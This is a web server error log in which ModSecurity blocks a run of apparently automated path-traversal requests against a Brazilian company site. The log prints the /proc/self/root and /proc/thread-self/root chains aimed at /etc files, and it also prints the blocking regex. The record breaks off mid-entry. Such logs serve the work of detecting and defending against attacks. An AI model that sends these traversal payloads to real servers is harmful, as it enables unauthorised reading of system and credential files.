[Thu Mar 19 03:53:49.763142 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:32842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudffu8EFLIOrSqIptkYQAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:53:50.492077 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.241.31:51390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudfuyqAr6etmhZHNoqyAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 03:53:54.244842 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.241.31:54982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudgl_V7PWP6ixUYl6CdwAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:53:56.732226 2026] [:error] [pid 27293:tid 140411691570944] [client 74.7.241.31:54988] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudhP-YZRR_7pZ7nDJULQAAA8Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 03:53:57.015312 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:35938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudhfu8EFLIOrSqIptkagAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:54:05.120144 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:37228] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudjeoXxyEfFpUF8f_YFgAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:54:15.250097 2026] [:error] [pid 19093:tid 140411708356352] [client 74.7.228.61:37824] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abudl1_V7PWP6ixUYl6ChwAAAoQ"]
[Thu Mar 19 03:54:17.160295 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:37238] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudmfu8EFLIOrSqIptkeAAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 03:54:42.997392 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:39826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudsgkwaGbbGflqUZB7IgAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:54:44.263755 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:57152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudtOyqAr6etmhZHNoq3QAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:54:45.571286 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.241.31:57158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudteyqAr6etmhZHNoq3gAAAE8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:54:47.931090 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:57164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudt-oXxyEfFpUF8f_YMAAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:54:49.170918 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.241.31:37450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuduQkwaGbbGflqUZB7JwAAAMs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:54:51.482251 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:37464] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudu-yqAr6etmhZHNoq5QAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:54:57.048117 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:37470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudwda6ubjKNq_cu4YF2gAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:00.627910 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:59776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudxAkwaGbbGflqUZB7MAAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:06.952517 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.241.31:59792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudyhkFeYa1D6dYQnCzsAAAAc0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:10.342639 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:34170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudzta6ubjKNq_cu4YF4wAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:11.726927 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:34186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abudz-oXxyEfFpUF8f_YOwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:16.501804 2026] [mime_magic:error] [pid 19093:tid 140411557287680] (70014)End of file found: [client 74.7.241.31:34190] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc
[Thu Mar 19 03:55:18.627497 2026] [:error] [pid 19093:tid 140411683178240] [client 74.7.241.31:45494] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abud1l_V7PWP6ixUYl6CpAAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:21.493212 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:45506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abud2da6ubjKNq_cu4YF5wAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 03:55:46.621318 2026] [:error] [pid 14269:tid 140411649607424] [client 74.7.243.128:35942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 